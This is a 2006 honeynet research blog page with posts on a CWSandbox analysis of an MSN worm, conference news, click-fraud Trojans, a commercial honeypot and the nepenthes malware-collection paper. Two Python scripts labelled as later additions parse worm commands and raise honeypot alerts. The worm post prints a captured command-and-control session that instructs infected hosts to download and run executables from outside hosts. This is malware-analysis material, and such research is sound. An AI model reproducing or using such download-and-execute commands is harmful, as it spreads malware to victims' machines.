CWSandbox vs. MSN Worms

Thursday, September 28. 2006
The very good weblog from F-Secure recently had an entry entitled "MSN Worm Used to Download Adware Programs" (thanks common for pointing this out!). For downloading additional malware to the infected hosts, the worm uses a very simple transfer mechanism on TCP port 80:
$ nc XXX.64.38.YYY 80
down http://www.lollpics.net/[Removed] a.exe;shell a.exe;
down http://promo.dollarrevenue.com/webmasterexe/[Removed] drsmartload1135a.exe;
shell drsmartload1135a.exe;
down http://www.uglyphotos.net/[Removed] Yinstall.exe;
shell Yinstall.exe;
down http://www.lollpics.net/[Removed] mny.exe;
shell mny.exe;
shell a.exe;
shell a.exe;
shell a.exe;

So the infected host just contacts XXX.64.38.YYY on TCP port 80 and then receives instructions to download several files, which are executed in the next step. Currently, four additional pieces of malware are installed on the compromised machine, one of them again being adware related to dollarrevenue.com. A full analysis report (detailed XML report) generated by CWSandbox is also available.
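As an added illustration (not CWSandbox code and not part of the original post), the following Python script parses a captured command stream of the kind shown above into the same sort of summary a sandbox report would give: which URLs were fetched, under which local names, and which files were then executed. The grammar is inferred from the capture on the page (commands separated by ";", "down <url> <localname>" and "shell <localname>"); the sample stream is the page's transcript with the same redactions, embedded as constructed input.

```python
"""Parse a line-oriented download/execute command stream into a report.

Added example, not CWSandbox code. The grammar is an inference from the
captured session: commands are separated by ';', 'down <url> <localname>'
fetches a file and 'shell <localname>' executes it.
"""
from collections import Counter
from urllib.parse import urlparse

# Constructed sample: the transcript from the page, with the same redactions.
SAMPLE_STREAM = (
    "down http://www.lollpics.net/[Removed] a.exe;shell a.exe;\n"
    "down http://promo.dollarrevenue.com/webmasterexe/[Removed] drsmartload1135a.exe;\n"
    "shell drsmartload1135a.exe;\n"
    "down http://www.uglyphotos.net/[Removed] Yinstall.exe;\n"
    "shell Yinstall.exe;\n"
    "down http://www.lollpics.net/[Removed] mny.exe;\n"
    "shell mny.exe;\n"
    "shell a.exe;\n"
    "shell a.exe;\n"
    "shell a.exe;\n"
)


def parse_commands(stream):
    """Split the raw stream into (verb, args) tuples.

    ';' is the only separator, so a line may carry several commands and
    newlines are treated as plain whitespace. Unknown verbs are kept so a
    reviewer can see them.
    """
    commands = []
    for chunk in stream.replace("\n", " ").split(";"):
        parts = chunk.split()
        if not parts:
            continue
        commands.append((parts[0].lower(), parts[1:]))
    return commands


def summarize(stream):
    """Build a sandbox-style summary: what was fetched, from where, what ran."""
    downloads = []          # (url, local_name) in the order received
    executions = Counter()  # local_name -> number of 'shell' commands
    unknown = []
    for verb, args in parse_commands(stream):
        if verb == "down" and len(args) == 2:
            downloads.append((args[0], args[1]))
        elif verb == "shell" and len(args) == 1:
            executions[args[0]] += 1
        else:
            unknown.append((verb, args))
    downloaded_names = {name for _, name in downloads}
    # A file executed without a preceding download would be unexpected
    # and worth a closer look.
    unsourced = sorted(set(executions) - downloaded_names)
    hosts = sorted({urlparse(url).hostname for url, _ in downloads})
    return {
        "downloads": downloads,
        "executions": dict(executions),
        "unsourced_executions": unsourced,
        "download_hosts": hosts,
        "unknown": unknown,
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_STREAM).items():
        print(f"{key}: {value}")
```

The host list from the report is what a defender would feed into DNS or proxy blocking, and the execution counter shows that a.exe is run four times, matching the repeated "shell a.exe" lines in the capture.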

And a link from a reader (thanks Jean-Philippe!): Trend Micro launches anti-botnet service. Seems like there are now several companies that offer such services; let's see who is successful...

Call for Papers: 16th USENIX Security Symposium

Tuesday, September 26. 2006
The Call for Papers for the 16th USENIX Security Symposium is now available. I am very proud to be one of the members of the program committee and of course I would like to see many honeynet-related papers submitted to the conference!

Important dates:
  • Paper submissions due: Thursday, February 1, 2007, 11:59 p.m. PST

  • Panel proposals due: Thursday, March 29, 2007

  • Notification to authors: Wednesday, April 4, 2007

  • Final papers due: Monday, May 14, 2007

  • Work-in-Progress reports due: Wednesday, August 8, 2007, 6:00 p.m. EDT

The conference will be held from August 6–10, 2007, in Boston, MA.

About USENIX Security:
The USENIX Security Symposium brings together researchers, practitioners, system administrators, system programmers, and others interested in the latest advances in the security of computer systems and networks.

All researchers are encouraged to submit papers covering novel and scientifically significant practical works in security or applied cryptography. Submissions are due on February 1, 2007, 11:59 p.m. PST. The Symposium will span five days: a two-day training program will be followed by a two and one-half day technical program, which will include refereed papers, invited talks, Work-in-Progress reports, panel discussions, and Birds-of-a-Feather sessions.


Hack In The Box 2006 Honeypot Summary

Monday, September 25. 2006
I'm now back from Hack In The Box 2006, the largest security conference in Asia. It was a really nice conference and if you have some time next year, you should go there and enjoy the conference!

From a honeypot point of view, there were three interesting presentations:
  1. Michael Davis - "Client Honeypots - Its not only the network": he gave a presentation about client-side honeypots, i.e., honeypots that are able to learn more about attacks against client applications like web browsers or e-mail clients. This kind of honeypot typically searches for malicious content, e.g., by crawling the web. The presentation contains links to the four most prevalent client-side honeypot solutions available at the moment.
  2. Nguyen Anh Quynh - "Towards an Invisible Honeypot Monitoring Tool": the presentation by Nguyen was about Xebek, a monitoring solution for honeypots based on Xen. It overcomes most of the weaknesses of Sebek, and he plans to publish it in the near future (hopefully).
  3. Thorsten Holz - "Playing with Botnets for Fun and Profit": my presentation dealt with nepenthes, CWSandbox, and some economic aspects of botnets.

All slides are now available at the material site.

CWSandbox vs. Click-Fraud Trojans

Sunday, September 24. 2006
Business Week had an interesting story about click fraud recently (also at /.). This seems to be a really lucrative business and there is of course also malware that helps the attacker to automatically generate clicks on websites.
One example of such a piece of malware is Trojan.Clicker (named by F-Secure), which currently also dominates the monthly world map of malware infections. The operation mode of this Trojan is rather simple: after the initial infection (e.g., download via bots), it remains resident in memory and periodically opens certain web pages with the help of Internet Explorer, thus generating clicks on those web pages. Hence, the attacker automatically generates revenue from his compromised machines...
A more detailed analysis of a particular Trojan.Clicker variant is available as CWSandbox report.

HoneyPoint Security Server

Saturday, September 23. 2006
There is a new commercial honeypot solution available: HoneyPoint Security Server. The description sounds like it is some kind of "honeyd on steroids" with nice alerting mechanisms: it creates virtual hosts on the network, and these hosts serve as sensors for a burglar alarm. Once a sensor is hit (e.g., during the reconnaissance phase prior to the attack), an alarm is simply generated, since nobody should access the sensors (the basic principle of honeypots). I'm looking forward to getting a trial version and blogging more about it later on, because currently it seems like everyone could build something like that with some more honeyd scripting...

Excerpt from the description:

[...] The idea is an old one. The implementation is new. The idea of honeypots goes back a long way. They are essentially based upon the idea that if you create artificial systems or services on your network, an attacker will not know if what they see is real. The idea is that in order to determine what is real, they will have to probe and attack all of the visible targets. In doing so, they will, in more cases than not, probe a honeypot - thus alerting security folks to their presence. Obviously, the more honeypots, the higher the likelihood of their being probed instead of a real system.

This is the basis for HoneyPoint. We use it to make our systems offer services across the network that appear to be vanilla and homogenous. Imagine a big 10×10 grid of light sockets. If you had a light bulb and were asked to screw it into some of the sockets in the board, but some of the sockets were real and would light the bulb, while others would set off an alarm - how would you go about identifying which ones were real and which were alarms? You might carefully examine them, but if they all look similar, the only way to know would be to try them.

That is exactly what we do with HoneyPoint. We dilate ports across our systems with similar appearing services, and then wait for attackers to try and figure out which ones are real and which ones are HoneyPoints. Just by doing what attackers do - that is, probing the network and services they find - they fall into our trap and alert us to their presence. Once identified, they can be quickly isolated and shut down by network security staff.
[...]
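The "burglar alarm" principle from the post and the excerpt (nobody legitimate touches a sensor, so any contact is an alert, and one source touching several sensors is a probable sweep) is simple enough to script on top of honeyd's own logging. The Python below is an added example, neither HoneyPoint nor honeyd code; it assumes honeyd-style packet log lines of the form "timestamp proto(num) S|E|- src sport dst dport" (the exact field layout is an assumption) and a set of sensor addresses, and produces the alerts that such a setup would raise. The log lines are constructed sample data.

```python
"""Burglar-alarm logic over honeypot sensor logs.

Added example, not HoneyPoint or honeyd code. Assumptions: a honeyd-style
packet log whose fields are 'timestamp proto(num) event src sport dst dport',
where event is S (connection start), E (connection end) or - (datagram /
stateless), and a known set of addresses that belong to sensors rather than
production hosts.
"""
from collections import defaultdict

# Constructed sample log lines in the assumed honeyd packet-log style.
SAMPLE_LOG = """\
2006-09-23-10:01:02.0001 tcp(6) S 10.0.0.77 3421 192.168.1.10 80
2006-09-23-10:01:02.0420 tcp(6) S 10.0.0.77 3422 192.168.1.11 80
2006-09-23-10:01:02.0911 tcp(6) S 10.0.0.77 3423 192.168.1.12 80
2006-09-23-10:01:03.1200 tcp(6) S 10.0.0.5 1055 192.168.1.20 445
2006-09-23-10:01:07.5000 tcp(6) E 10.0.0.77 3421 192.168.1.10 80: 0 0
2006-09-23-10:05:00.0000 udp(17) - 10.0.0.9 137 192.168.1.11 137: 78
"""

# Addresses that honeyd answers for; 192.168.1.20 is a real host, not a sensor.
SENSORS = {"192.168.1.10", "192.168.1.11", "192.168.1.12"}


def parse_log_line(line):
    """Return a dict with proto/event/src/dst/dport, or None if the line
    does not have the expected seven leading fields."""
    parts = line.split()
    if len(parts) < 7:
        return None
    _ts, proto, event, src, _sport, dst, dport = parts[:7]
    return {
        "proto": proto.split("(")[0],   # 'tcp(6)' -> 'tcp'
        "event": event,
        "src": src,
        "dst": dst,
        "dport": dport.rstrip(":"),     # 'E' and '-' lines end the tuple with ':'
    }


def alerts_from_log(log_text, sensors, sweep_threshold=2):
    """Alert on every new connection (S) or datagram (-) aimed at a sensor.

    Connection-end records (E) are skipped because the start already fired.
    Returns (alerts, sweeps): alerts is a list of (src, dst, proto, dport),
    sweeps is the sorted list of sources that touched at least
    sweep_threshold distinct sensors, i.e. the 'trying every socket' case.
    """
    alerts = []
    touched = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_log_line(line)
        if rec is None or rec["dst"] not in sensors:
            continue
        if rec["event"] not in ("S", "-"):
            continue
        alerts.append((rec["src"], rec["dst"], rec["proto"], rec["dport"]))
        touched[rec["src"]].add(rec["dst"])
    sweeps = sorted(src for src, dsts in touched.items()
                    if len(dsts) >= sweep_threshold)
    return alerts, sweeps


if __name__ == "__main__":
    found, sweepers = alerts_from_log(SAMPLE_LOG, SENSORS)
    for a in found:
        print("ALERT sensor contact:", a)
    print("probable sweeps:", sweepers)
```

In the sample, the connection to 192.168.1.20 on port 445 raises nothing because that address is a real host, while 10.0.0.77 touching three sensors in a second is reported both as three individual alerts and as a sweep; the sweep threshold is the knob that separates a single stray connection from reconnaissance.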

Philippine Honeynet Project: "Hackers in the House"

Saturday, September 23. 2006
A detailed analysis of a honeypot compromise at one of the honeypots of the Philippine Honeynet project is available at their site. Our honeynet is currently rather silent, mainly due to the fact that we are currently in a rebuilding phase - but by the end of next week, we should have a couple of honeypots up and running again.

The Nepenthes Platform: An Efficient Approach to Collect Malware

Thursday, September 21. 2006
At the RAID'06 conference taking place in Hamburg between September 20 and 22, we published a paper on nepenthes. It describes nepenthes in detail and gives an overview of preliminary results. I had previously published excerpts from the paper here at this blog, but now the final paper is also available.

Abstract:
Up to now, there is little empirically backed quantitative and qualitative knowledge about self-replicating malware publicly available. This hampers research in these topics because many counter-strategies against malware, e.g., network- and host-based intrusion detection systems, need hard empirical data to take full effect.
We present the nepenthes platform, a framework for large-scale collection of information on self-replicating malware in the wild. The basic principle of nepenthes is to emulate only the vulnerable parts of a service. This leads to an efficient and effective solution that offers many advantages compared to other honeypot-based solutions. Furthermore, nepenthes offers a flexible deployment solution, leading to even better scalability. Using the nepenthes platform we and several other organizations were able to greatly broaden the empirical basis of data available about self-replicating malware and provide thousands of samples of previously unknown malware to vendors of host-based IDS/anti-virus systems. This greatly improves the detection rate of this kind of threat.
